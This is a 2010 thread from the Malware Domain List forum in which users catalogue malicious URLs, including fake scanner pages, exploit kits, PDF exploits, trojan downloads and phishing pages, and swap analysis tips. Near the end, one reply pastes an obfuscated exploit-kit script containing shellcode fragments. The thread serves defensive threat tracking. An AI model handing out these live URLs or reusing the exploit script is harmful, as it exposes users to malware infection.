Malware Domain List
Malware Related => Malicious Domains => Topic started by: lelenina on June 13, 2010, 05:09:16 pm
-
http://memory-scanner.com
Fake Scanner Page
http://scanner-models.com
Fake Scanner Page
http://globalwarmingtray.info/nc12/index.php?ID=1
Redirects to fake scanner page
-
http://justatube.com
Fake Porn Site
http://real-tube.org
Fake Porn Site
-
http://baronessan.se/.9k7ea/?getexe=se1ws.exe
Koobface
-
http://ohh.please-unblock-me.com/?oazagezitv
-
http://scanner-glass.com
Fake scanner page
-
http://scanner-manufacturer.com
Fake Scanner Page
http://scanner-glass.com
Fake Scanner Page
http://code-scanner.com
Fake Scanner Page
-
http://laser-copier.com
Fake Scanner Page
-
http://rmets.biz/cgi-bin/cn.aspx?ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU5EZzFPVFl3T0RVaU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8xT2lJek5qWTJPU0k3Y3pvME9pSnJjSEJwSWp0ek9qTTZJams1T1NJN2ZYTTZNem9pYldRMUlqdHpPak15T2lJek9EZ3daV0pqTldJME9USTNOVE5qTlRZMk56azJPREkzTURJeE9URTJOeUk3ZlE9PQ%3D%3D/s00a106201317r0409Xf1646355Ybd4d7a0fZ0100f080
NeoSploit
http:///fairscansecurity.com
Fake Scanner Page
http://cheapscansecurity.com/
Fake Scanner Page
http://burnscansecurity.com/
Fake Scanner Page
-
http://best-scanner-2010.com/
Fake Scanner Page
http://mega-scan-pc-new14.net/?code=1500
Fake Scanner Page
http://mugyra.org/sutra/in.cgi?15=&ID=1
Redirects to Fake Vimes
-
http://super-tubes-mego.com/xplay.php?id=45230
http://member-tube.com/xplay.php?id=40081
http://clear-web-tube.com/xplay.php?id=40081
http://modern-tube.net/xplay.php?id=45230
http://Last-sex-tube.com
http://best-tube-world.com/xplay.php?id=40081
http://sunny-tube-house.com/xplay.php?id=45043
http://super-cool-tube.net/xplay.php?id=45284
http://suoer-mego-tubes.com/xplay.php?id=40081
http://clear-great-tube.com/xplay.php?id=45284
All of them are fake porn sites.
-
http://www3.epic10.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nF6ZZGSdkZzHlGk%3D
Redirects to fake scanner page
http://www2.sunclear.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZZWdZWRkmGublWWIo6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZXZeZYmJjWqarlmqTYmeeXZaXlGNtWJnInriMWKuimHVsams%3D
Fake scanner page
-
http://ultimatewide.in/4/getexe.php?spl=mdac
Insain trojan
http://gromalines.pl.ua/grad/222/ya.php
Redirects to fake scanner page
http://highsecurityscan.com
Fake scanner page
-
http://hotsecurityscan.com
fake scanner page
-
http://www4.omgomg9.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nV7DZJadk5zHmJI%3D
Redirects to fake scanner page
http://www1.truefind44p.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZpXHZZZkmmubmY6Io6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZX52faWVjWqarlmqTYmeeX5ydm2ZtWJnInriMWKuimHVsams%3D
Fake scanner page
http://opensecurityscan.com/
Fake scanner page
-
http://ad.googleanaliticks.com/info/u2.html/s002106204317r0409Rabff69a9Xbba2610cY3b3f5a86Z0100f060
NeoSploit
-
http://dasafa.info/page/new.php/s002106201317r0409Ra38dbe4fX865af0a8Yca6a16c0Z0100f080
NeoSploit
-
http://new-tube-fest.com/xplays.php?id=45031
fake movie site
http://designnewmedia.com/video-plugin.45031.exe
fake codec
-
http://billivilli.co.cc/bilvil/nc111/nc.php?uid=2114&pid=3
Redirects to fake scanner page
http://sendyourtraffic41.org/elka/404.php
Redirects to fake scanner page
http://best-online2.com/tds_privatcoin_go1.php?ID=100000
Redirects to fake scanner page
-
http://rheal.biz/cgi-bin/cn.aspx?ID=100000
NeoSploit
-
http://huyqvpeotwyn.com/tre/sena.py
NeoSploit
-
http://digitalmediasonic.com/video-plugin.45031.exe
Fake codec
-
http://superupdates.com/video-plugin.45031.exe
Fake codec
-
http://dotroot.tk/1.php?ID=1
Redirects to fake scanner page
-
http://b23.ru/e1ij
Facebook phisher
-
http://4info-tools.com/video-plugin.45031.exe
Trojan
-
http://freemovieswww.info/player_update/divx_fix_patch.exe
Trojan TDSS
-
http://parkinssu.info/hb/
Fake Scanner Page
-
http://mediapromedia.com/video-plugin.45031.exe
Trojan
-
http://caazzaport.co.cc/caaza/go.php?sid=1
Redirects to fake scanner page
-
http://yastatic.co.cc/333/ya.php
Redirects to fake scanner page
-
http://rmetsih.biz/cgi-bin/cn.aspx?ID=1
NeoSploit
-
http://dvdmusicinfo.com/New-Video-Addon.48577.exe
Trojan
-
http://everytds.tk/in.cgi?3=&ID=1
Redirects to fake porn site
http://vogel-tube.com/xfreeporn.php?id=45309
Fake porn site
http://digitalmediaset.com/video-plugin.45309.exe
Trojan
http://digitalmediaset.com/video-plugin.45031.exe
Trojan
-
http://onlyscan.tk/goo/oCi8j.pdf
Pdf exploit. I believe it installs Defense Center.
-
http://onlyscan.tk/goo/zCue.class
Exploit?
-
http://digitalpackback.com/New-Video-Addon.48665.exe
Trojan
-
http://electronicbankdata.com/video-plugin.45309.exe
Trojan
-
http://www3.doligz39td.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3JXsiYlWmdYmiaxA%3D%3D
Redirects to fake scanner page
http://www2.yourprotection86.co.cc/?p=p52dcWplanKHjsbIo22AgXOOipnVbWGWY4nT1m6uqG2Lw8ydb5aYen5arK3NaseXlmRfbJholmLFVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooWObXmGYYZGVm2llY2eZh9WemHFfqKtxaWuYZpaYY2NeZFis11%2BfYWKdZpWWlWRoYlzIxKCOhVqwnZxxcWyV
Fake scanner page
-
http://truestarmedia.com/video-plugin.45309.exe
Trojan
-
http://everytds.tk/in.cgi?4=&ID=1
redirects to exploit kit
http://dfrscanner.tk/non/index.php
Exploit kit
http://dfrscanner.tk/non/um1zi.pdf
Pdf exploit
-
http://activemedianews.com/video-plugin.45312.exe
Trojan
http://mediaservicesdata.com/New-Video-Addon.48577.exe
Trojan
-
http://globstere.info/gh/
Fake scanner page
-
http://nike1ot2n.com/ab/tmp/pdfopen.pdf
Pdf exploit
-
http://nike1ot2n.com/ab/tmp/m.vbs
the second part of the exploit
http://nike1ot2n.com/ab/l.php?i=14
Trojan.Downloader
-
http://allxscan.tk/ddt/fVJV.pdf
Pdf exploit
-
http://mtravel3biz.com/in.cgi?19=&parameter=porn&mudo=dumd&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU9EQXlOakUzSWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRFNE16TTBJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SWpCbU9UZzBaRE13TURrMVlqRm1aRFE0WWpVMFlXSXlNR0kyT1RobFlqUTNJanQ5
Redirects to exploit kit and fake scanner page?
-
http://www.domainnamereg1.in/retn/qb0pfsg/lgut722.php
Java exploit
-
http://92.63.107.10/223/tmp/pdfopen.pdf
Pdf exploit
http://92.63.107.10/223/tmp/m.vbs
Second part of the exploit
http://92.63.107.10/223/l.php?i=14
Trojan.Downloader
-
http://firstport.in/x/?src=kostes&id=best&o=o&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU5qRXhPRGt6SWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRJeE1UUTFJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SW1Zek9UaGlOV0ppWm1abVpUaGpaRGd6WXpRNVpUTmlOalZoWkRObFpUTXlJanQ5
Directs to exploit kit?
-
http://datadigitalonline.com/video-plugin.45031.exe
Trojan
-
http://flashdns.in/x/?src=kostes&id=best&o=o&ID=100000
Exploit kit
-
http://fitrst.ignorelist.com/3/?c=11
Fake scanner page
-
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)
-
The fake scanner page is a side effect only.
It is an Eleonore exploit kit. The fake scanner URL is probably called only if the exploits are unsuccessful.
Look at function complete(). I have seen such a combination before.
http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
-
http://ntscanner.in/new/index.php?ID=1
Exploit kit
-
Wepawet really comes in handy when analyzing exploits. I have that website bookmarked. Thank you for showing me that. :)
-
http://mtravel3biz.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://stifast31.info/bv/
Fake scanner page
http://bereto8ns.com/zbb/index.php
Exploit kit
http://superflashplayer.com/video-plugin.45031.exe
Trojan
http://theflashclub.com/New-Video-Addon.48577.exe
Trojan
-
http://super-fresh-tube.com/xfreeporn.php?id=45309
Fake porn site
http://mediafirstsystems.com/video-plugin.45309.exe
Trojan
-
http://tdsinfo.tk/in.cgi?3=&ID=10000
exploit kit
-
http://netmediaforum.com/video-plugin.45309.exe
Trojan
-
http://lcitsih.biz/index.php?ID=1
Exploit kit
-
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
-
http://adobeflash-ver16.co.tv/zxce/install_adobe_flash.exe
Trojan
-
http://zsitsih.biz/index.php?ID=1
Exploit kit
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
-
http://dandbcorporation.com/l.php?i=14
Fake AV
-
http://awrinc.net/style/images/go.php?sid=1
Redirects to fake scanner page
-
http://bellday.ru:8080/index.php?pid=10
Exploit kit
-
http://illinated.co.in/index.php?ID=1
Exploit kit
http://illinated.co.in/tmp/libtiff.pdf
Pdf exploit
http://illinated.co.in/l.php?i=14
Trojan.Downloader
-
http://scripttoscan.co.cc/installer.0042.exe
Fake AV
-
http://www3.trust-av41.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXsiYk2mbY5udkQ%3D%3D
Redirects to fake scanner page
-
http://averagedaddy.com/?showc=vindictus
Redirects to fake scanner page? According to Norton Safeweb.
-
http://213.155.29.144/news/l.php?deserialize=1b&i=
Fake AV
-
http://temptrouble.in/4/index.php
Exploit kit
http://temptrouble.in/4/getexe.php?spl=mdac
Trojan
-
http://allvexxx.tk/1/index.php
Exploit kit
-
http://avadrom.co.in/index.php?ID=1
Exploit kit
-
http://red-xxx-tube.net/cgi-bin/setuppatch.pl?adv=1481
Trojan
http://capdataservice.com/New-Video-Addon.48577.exe
Trojan
http://hotxtubeonline.com/mov524/movie.exe
Trojan
-
http://11.wenmo.in/x/index.php?s=036cb76056fdbc21df981dec95f43cb6
Exploit kit
http://11.wenmo.in/x/l.php
Trojan
-
http://allmediavision.com/New-Video-Addon.48440.exe
Trojan
-
http://bestdatawork.com/video-plugin.45035.exe
Trojan
http://filesserveronline.com/New-Video-Addon.48577.exe
Trojan
-
http://psoriasisinstruction.com/wp-content/43/sexy-bodies.html
Java on screen popup leads to fake codec
-
http://video39-tube.servepics.com/video.php?l=6:09&id=1&n=teen&a=nEcroS&path=./tmb/teen/03.jpg&rat=./img/rating5.jpg&v=20750
Leads to fake AV disguised as a codec
-
http://tube-hosting270.sytes.net/getfile95666/flash_player_installer.exe
Fake AV
-
http://videos90-host.redirectme.net/download-id72929/flash_player_installer.exe
Trojan
-
http://videos90-flash.3utilities.com/?n=teen&id=1
Leads to trojan
-
http://tube62-host.sytes.net/?n=teen&id=1
Leads to trojan
-
http://flash36-videos.redirectme.net/?n=teen&id=1
Directs to trojan
-
http://video96-pics.servehttp.com/?n=teen&id=1
Directs to trojan
-
http://02.acani.in/x/index.php
Exploit kit
http://02.acani.in/x/l.php
Trojan
-
http://websmeter.com/new/index.php
Exploit kit
http://websmeter.com/new/load.php?f=1&e=4
Trojan Iflar
-
http://flash33-hosting.servepics.com/?n=teen&id=1
Directs to trojan
-
http://hosting17-video.3utilities.com/?n=teen&id=1
Directs to trojan
-
http://modern-tube.net/xplays.php?id=40030
Directs to trojan
-
http://hetupoxiy.cn/chat/bd3225fe436c29ac8474e83d3cd38c08.php?showuser=25329981&showforum=s1
Pdf exploit
-
http://actdataonline.com/New-Video-Addon.48577.exe
Trojan
-
http://193.105.174.53/DE/index.php
Exploit kit
http://193.105.174.53/DE/l.php?deserialize=e9&i=
Trojan
-
http://ca200dajskjdhd.com/kde/index.php
Exploit kit
http://ca200dajskjdhd.com/kde/l.php
Trojan
-
http://178.239.48.101/index.php?q=9VGU1G21ML942SE396872SD4HB9H5PB80DX99TMS00203MN3UO4XD4U4Z7PzcpQRhbVTE8VmtbNzlSXmlRU044IU00NlAlUCw%252BDglqaQsNenxrCB4DAQcxf09kMwAkJwJlBWsHNSFnBnRRB3R4XFIAYSALAQNZAAVrJgcrcwE0BGJ6CQBzaQ4JbDk2Q0Q%253D
Fake scanner page
http://acer.is-a-geek.net/3/?c=917
Fake scanner page
http://digitalartfact.com/New-Video-Addon.48577.exe
Trojan
-
http://bondbm3x.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://mohotwrxst.info/hn
Fake scanner page
-
http://fchfdghfg.tk/new/index.php?ID=1
Exploit kit
http://fchfdghfg.tk/new/41fdcb12a4bc143f98999fcda8927ecc.pdf
Pdf exploit
http://fchfdghfg.tk/new/load.php?f=1&e=2
Trojan
-
http://sixpornvideos.in/pornhub/animal-porn-movie.exe
Trojan
-
http://xatechbot.com
Leads to fake codec
http://0scene.info
Leads to trojans
-
http://www.hookranger.info/tx/
Fake scanner page
-
http://ssdssds.co.cc/x/index.php?s=8b02a28ea6391cdd77172f450ecf4855&ID=1
NeoSploit
-
http://ssdssds.co.cc/x/l.php
Trojan
-
http://fastsofon.com/any3/5-direct.ex
Fake AV?
-
http://www3.real-security83.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3LXpqYnGlvZZeVkQ%3D%3D
Redirects to fake scanner page
-
http://www.searchfertile.com/a/ad
Fake AV
-
http://max3wrxstia.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://www.lancergooe.info/yu/
Fake scanner page
http://nolewe0ret.com/ab/index.php
Exploit kit
http://nolewe0ret.com/ab/l.php
Trojan
-
http://www.offline.pt/template/go.php?sid=1
Redirects to fake scanner page
-
http://datzsdt.co.cc/x/index.php
Exploit kit
http://datzsdt.co.cc/x/l.php
Trojan
-
http://ppcube.com/in.cgi?8
Redirects to fake porn site and fake scanner page
-
http://engsquad.com/?affid=387&subid=landing
Fake scanner page
-
http://lilumy3wxt.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://n2lewe1ret.com/ab/index.php
Exploit kit
http://n2lewe1ret.com/ab/l.php
Fake AV
-
http://matthall.com.au/properties/index.php
Eleonore Exploit pack version 1.3.2
http://matthall.com.au/properties/statss.php?exefile=1
Control panel of Eleonore Exploit pack version 1.3.2
http://matthall.com.au/properties/load.php
Trojan
-
http://mainstep.in/4/index.php
Exploit kit
http://mainstep.in/4/l.php
Trojan
-
http://pradolast.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://mobielast.com/ab/index.php
Exploit kit
http://mobielast.com/ab/l.php
Fake AV
-
http://camarulon.com/in.cgi?20&parameter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://laizamoko.info/cvd/
Fake scanner page
http://nocertesl1.com/ab/index.php
Exploit kit
http://nocertesl1.com/ab/l.php
Fake AV downloader
-
http://softplugin.in/7/?name=best&vid=hidden&cat=kostes&offset=4&last=image&ID=1
Exploit kit?
-
http://78.26.179.197/index.php
Exploit kit
http://78.26.179.197/l.php
Fake AV Downloader
-
http://ceberd.com/wev/foolwrite.php
Redirects to pdf exploit
-
http://www.bestellkanal.tv/images/redir.php
Redirects to fake scanner page
-
http://air3liness.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://lokonetorzz.com/mms/
Fake scanner page
http://nevoex65eo.com/ab/index.php
Exploit kit
http://nevoex65eo.com/ab/l.php
Fake AV Downloader
-
http://78.26.179.203/index.php
Exploit kit
http://78.26.179.203/l.php
Fake AV
-
http://sugilofyjypomito.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
TDSS
-
http://universesearches.com/12/
Redirects to fake porn site
-
http://tokyocrab.in/go.php?sid=6
Redirects to fake porn site with trojan TDSS
-
http://budooqoejofihy.cjb.com/maindirectory/get.php?name=Sex_Toys_Movie_129.mpeg
Trojan
-
http://10-4warning.com
Yahoo! phishing?
-
http://first-malware-checker.co.cc/secure1/?id=213
Fake scanner page
-
http://helesouurusa.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Trojan TDSS
-
http://abodeflash-vol33.co.tv/om/ms.php
Trojan
http://qusocereloteryg.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Fake AV
-
http://host68-video.sytes.net/?n=teen&id=1
Fake porn site leads to trojan
-
http://scantrafficstruct.co.cc/installer.0042.exe
Fake AV
-
http://mediaforearth.com/video-plugin.45031.exe
Trojan
-
http://iakoberoonn.info/mmb/
Fake scanner page
http://nevobbqq2o.com/ab/index.php
Exploit kit
http://nevobbqq2o.com/ab/l.php
Fake AV
http://nevobbqq2o.com/ab/exe.exe
Fake AV
-
http://best-antimalware-scanner.co.cc/secure1/?id=213
Fake scanner page
-
http://interammo.com/shop/images/redir.php
Redirects to fake scanner page
-
http://xvideostube.cjb.net/
Fake porn site directs to trojan
-
http://free-scanner-online.co.cc/secure1/?id=213
Fake scanner page
http://szyseyz.co.cc/x/1.zip
Trojan?
-
http://grillout3s.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
-
http://onlineservice1.co.cc
Fake scanner page
http://onlineservice1.co.cc/?do=getexe&id=1
Trojan
-
http://rorty-tube.com/xplays.php?id=45031
Directs to trojan
-
http://elenatyr3s.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://kiamagentoss.net/evo/
Fake scanner page
http://whykersspt.com/aa/index.php
http://whykersspt.com/aa/tmp/libtiff.pdf
http://whykersspt.com/aa/l.php?i=8
http://whykersspt.com/aa/exe.exe
Exploit kit fake AV downloader as payload
http://1eb6499c0d3856f5220e282fec1592.co.cc/preinst.php?id=02909
Fake AV
-
http://xxxvideo-xjxq.cz.cc/go/?afid=94&time=1283559846
Trojan downloader
-
http://merlion3oll.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnn1
Redirects to fake scanner page
http://tucointopp.com/img/
Fake scanner page
http://jazzstibbtm.com/aa/index.php
Exploit kit
http://jazzstibbtm.com/aa/l.php
http://jazzstibbtm.com/aa/exe.exe
Fake AV Downloader
-
http://noplic.org/
Redirects to fake porn site with trojan
-
http://solo-hootersxxx.redirectme.net/downloadflow/flowplayer.10.467.exe
Trojan
-
http://slut-topxxx.sytes.net/?id=0
Fake porn site leads to trojan
-
http://log_account_activation.t35.com/verifyaccount.html
Facebook phishing
-
http://balls-boobsxxx.servehttp.com/flow-download/install_flow_player.10.284.exe
Trojan
http://keygen.fileave.com/drivers.exe
Trojan
-
http://pleasing-tube.com/xplays.php?id=45031
Directs to trojan
http://loadmediameans.com/video-plugin.45031.exe
Trojan
-
http://merlion3oll.com/in.cgi?20&parameter=jonn4b&ur=1&HTTP_REFERER=nnn1
Redirects to fake scanner page
http://uikou.in/scaner/?id=02909
Fake scanner page
http://zestrsooots.com/aa/index.php
Exploit kit
-
http://nojtul.co.cc/c/index.php
Phoenix Exploit Kit
http://nojtul.co.cc/c/statistics.php
Control panel of Phoenix Exploit Kit
http://nojtul.co.cc/c/l.php
http://nojtul.co.cc/c/exe.exe
Trojan
-
http://buyshieldec.com/dimesis.php?ID=19776
Redirects to fake scanner page
-
http://jewertlins.com/stars/index.php
Exploit kit
http://jewertlins.com/stars/l.php
Trojan
-
http://titolutis.cn/1/index.php
Phoenix Exploit kit
http://titolutis.cn/1/statistics.php
Control panel of Phoenix Exploit Kit
http://titolutis.cn/1/l.php
http://titolutis.cn/1/exe.exe
Swisyn trojan
-
http://huzytaj.co.cc/get/index.php
Exploit kit?
-
Do you receive any content from this URL? I don't get anything.
Special referer?
-
http://huzytaj.co.cc/get/?pg=171&action=italynew&e=post
Same as
http://www.malwaredomainlist.com/mdl.php?search=jabylat.co.cc&colsearch=All&quantity=50
but
/get/?pg=171&action=italynew&e=post
works only with an IP from Italy.
-
http://goupdates.is.com/
Redirects to exploit kit.
-
http://vobuzmgsy.ru/wint2/
Redirects to fake scanner page
-
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
Exploit kit?
-
http://eveninglottery.cz.cc/index.php?s=1&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/d.jar
http://eveninglottery.cz.cc/java.php?jar=1
http://eveninglottery.cz.cc/pdf3.php
http://eveninglottery.cz.cc/loadd.php
http://eveninglottery.cz.cc/load.php?sploit=JAVASMB
http://www.virustotal.com/file-scan/report.html?id=643c9528038b7f0202cc07c18536beca7004849aa2c9dbfc1dd2dcd9313937ba-1287242215
-
Thanks. How did you find all of those URLs? Wepawet did not work for me.
-
I tried index.php?s=1&u=4cb83405e1f594cb83405e2342
1 instead of 2
and decoded the page with Malzilla
http://wepawet.iseclab.org/view.php?hash=f4a5bbcd8cd803d4184f32535466751b&t=1287263312&type=js
-
http://pihrbu.net.in/scaner/?id=02915
Fake scanner page
http://pihrbu.net.in/get.php?id=02915
Fake AV
-
http://zgggrusd.ru/wint2
Redirects to fake scanner page
-
http://updatenews.cz.cc/firefox-updates/
Fake Firefox update
http://updatenews.cz.cc/firefox-updates/ff_secure_upd.exe
Fake AV
http://binertug.com/2ajimifr1.php?s=IBBGA
Exploit kit
-
http://bentrolmy.com/3d8h6j60fll.php?s=IBBGA
Exploit kit
-
http://djdbttb.co.cc/red.php
Iframe directs to exploit kit
http://broundfal.com/dm3rgu.php?s=IBBKB
Exploit kit
-
http://4frank.cz.cc/c/enasfmdtiwjwkujm1.php
Exploit kit
-
http://curtyacupt.com/mytds/go.php?s=32
Redirects to fake scanner page
-
http://myutilitom.com/eoiouo8aa781io/kwgmctgvjrfmcqy.php
Exploit kit
-
http://webvideocentral.net/xplays.php?id=45031
Directs to trojan
http://fileplatz.com/video-plugin.45031.exe
Trojan
http://ymedonesalykura.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Trojan
http://190.162.24.18:11066/index.html?u=406&t=1
Fake scanner page
-
http://sungbyuk.com/51ba0qq5x.php?s=IBBGA
Exploit kit
-
http://bestrecie.com/bjzlmpc779rh.php?s=IBBKB
Exploit kit
http://bestrecie.com/yocraqywyoyqe.pdf
http://bestrecie.com/yudrevgpeukrini.pdf
http://bestrecie.com/fpdletxubniuewd.pdf
http://bestrecie.com/crknxwbocphwctf.pdf
Pdf exploits
-
http://vitaminki.co.cc/
If referrer is google, iframe directs to exploit kit.
http://yourqare.com/anawa8h8.php?s=IBBKB
Exploit kit
-
http://lampasit.com/dx.php?i=91e33396-775d-4b95-81ce-c5084c00a332&a=1091409010&f=0
Tdss
-
http://availableused.co.cc/red.php
Redirects to exploit kit
-
http://whitesquarecube.com/1/gqitgzjqhlfph.pdf
http://ujsoltfinl.com/xwgzjmgwyvht.pdf
Pdf exploits
These PDF files are encrypted. Can Malzilla be used to find the URLs of the payloads they download? If not, how can the URLs be found?
-
http://company777.com/xp.php?ID=19776
Redirects to fake scanner page
-
http://brindlamp.com/j2pc33.php?s=IBBKB
Phoenix exploit kit
http://brindlamp.com/fpxohzcnfwklkze.pdf
Pdf exploit
With the new Phoenix exploit kits, the path to the payload is completely random. It is not as simple as l.php or exe.exe anymore. How can I find the URL to the payload if Wepawet is being too slow?
Thanks.
-
Use Malzilla's decoder tab:
1. Delete everything that is marked red.
2. Cut the green block and paste it at the end of the script.
E=-0aarEunp/ayyn-tdyt}c)u(jhBaap>oa>rldroiv4>>itien`ss`ofbt,s6-+oedHepci[odW=22E2a2E2D6=04F05A80BB9B29E043A1D94B40050000E4B83C12DD4E4CC794C08878808585449B9B058068085102B5500CA613334F2B6642E61BBD55DE7001E2CB7DD03D'0000213007656F6D6564657861644E7604020003090F0901m2036D6069ses.'v',N=|79=)'eE23662628283127'd8'A64560253A76600Na82F50752E5A244820,h'FF+082E4E576068}4ah2FeE51285B27636(01aF9m2F272E242364=,)aunn't)'A'u,o){G`]rl[=ssa'l((.()P.(1h;3SkeC}m)i{blse(1I(4`n'r'adg{p0ha0a[C900F0300061312E2601B064036E4C6D0E75646F606E4060717F636F6C6C6E637473445D5B647560736166001A0C0E070108190101000401000A006200D111A202000()EriEti-4E`u%0087u%001du%8913u%6e15u%20a0u%a5a8u%1c10u%4c5eu%a890u%00a0u%77c6u%403fu%0028u%d008u%05edu%2020u%00f8u%4416u%371797u%Dr8216u%0%A633u'Ist=osA:p`5`+*A=m;t.o.gpuf)0ibcfdep3{a~c~`g~l}oDuzvT=d`rOMotDmpn`6atw{vs`hh2{2eynr%e`.>)rcaf`f4+a0~~``mn]i`i)u`sp3eynstyxts2O`62i3`.tnur;=`g.s`i`=l`toaguvgtyqv)uelsu`c=:`+a4it)oG`cf~n{e{()o+t(tsce;uf`i~JsLe.RagyineheerimeewcN`teeyhtmszitesocialz~P0v4tnCe`a-d`capb2shfl`=ai0`{ni=ldarten;'c180';enp`j`2-Bh`Ma''t'=nrnematXekcosctnre{)ecv(e=gn0ensd;i;e(e#ed`ei{'Emtt;puyLkEstt'cpt'(r'50ajTph,e.s(ih.se/.sesc(Vnv-alnpipoo`e)s-Fu`eC`08ureCmtenbmp/t.(.rch{n)eermlj<wl<cggimce2<~d.dv`&esow(ju`iE4`sd)S`Nrn'vaF'7E76rF6F38'34F4113F4AD4449941BF2283F322003CC04B30C46D1803124BE2E08D817360304060C5040B5D00EBF7390D2E2D6934564B7DE376CF498837524F5607B054;8000001005E097E6931066461491F700A0900010102F3040e021E690C6vch9$=)1`=|,,={528F+976532865706WaBCF30276035637860`=A7F0032A2E282024'0e+50t02A262A28686i7me75s2F4424594867s'+m50e32B4560606B3fl;tn)tir;wt,t`d;tef+ov1lper)vl'p(&Dpl)z}1Hv{K}e;osjah((2Ns,9=)`%r1tn.0)y;sa;604F010104317605D00F01800C75646C6365632F396D197379667561616578726445634961406364737F511A17060307020A17000103010149DE4008000402020000);EidC=d24Cf5u%d30eu%1468u%5e13u%ee20u%0807u%e915u%2f27u%2fa0u%150du%1500u%0020u%0672u%0130u%0055u%1010u%0100u%0f0eu%c6c6u%0=4707u%`%F6D7u'u%E226;Mky`c.l`B?0~`2l`etynna)rn`{xde.u()r`ilR3`~t;.;trnotj=`bsMoEfrpe(d7lrhna
t+``.v;mpceuw4v`)otr`|```rxA`b1[e`f~n{saeu(mp(.G.dhh`((;,s2~N3cngi`i)le(z=`l+`fc,nk)h.Uu{n`e.n=o``0)r(sh;tb=o`sssnss{n`ishPB`}no<szo.EMpfd)pnc`*``ozu`+(Le1u`+.Yipiezh`tfozxee)`9a/Oci(+p1ehtrel0ceue0`ynx0haode=p`e.tvol7A~+dnea3`cBB~t+al~o.x``otXetrOCThlekrgsrs{{tasw`tecnuue`]}n'hunyitn}'Re(rdemI='ApoE)t`e)'icA4reT.e'as.'nps.B/S.)ha)A`ajm.d?npfr=E;i0E)oaT'40n`aTe(`pleejoboaya(Sc{cii`ulpSu/=.epaa-5/;,g)(f&(ibe'erod-4e)c;P=aodBit(62602`2562/401F0372FA04278E86628A95B7ABD9008335439A268CA88FF4E8EB7B7A67F8535565010C58404C3BEC5000FF6F38B23C38BC07B63046D07D175E438A7B24Ev200040010F5D766161666E4579766473070D00010A0F0009320961606D=t.'v=|69'(00'f9+28'272E295E6836ItC6B7066A63326A6109tA5F'0642A2855562;,st60h292445402B63f,es12a620292F56676v)'eE23284641667162di}cc{.fipit`e'y}rti)Ff]vlIs)fvkds&Fdv)ce)OgsTco'nves.'s,`v0,=)nu`)hos0;(ass}004F101010502704200026A10647C6F646E456F60646472694E6072717664646E6C754F65644E6C14796317010D0F1109010D070200070909A00F122342093202320;}Rt=T0=85Td39u%08b4u%ee90u%a05fu%a000u%9080u%5e2fu%664eu%f800u%200cu%e000u%0606u%589bu%b720u%20e8u%490au%b100u%fcd4u%f667u%s%2647usu%C603;7u%E39fEd(f,ml6a`0At`ltmh.e(t)oc(vb()pnM)o=f.e`+`h}seyecEfV`aeezvF)et.ni82(iulr`=:la}pett~f)a1;ti`a|S+2gfl+e6td=`ssthr{s(petmafViic~v``.~oH2.c,f~n{e{se=3o`b`h`cp{ifrNtnccxc`u(1;{ga.i}oc`u(ttigiit`~pirjPivtr`.nSKG~rXo{ege=2=&weso8~EM0r+8fboez`er~``dein-;=0r4P2g~`.3.Yi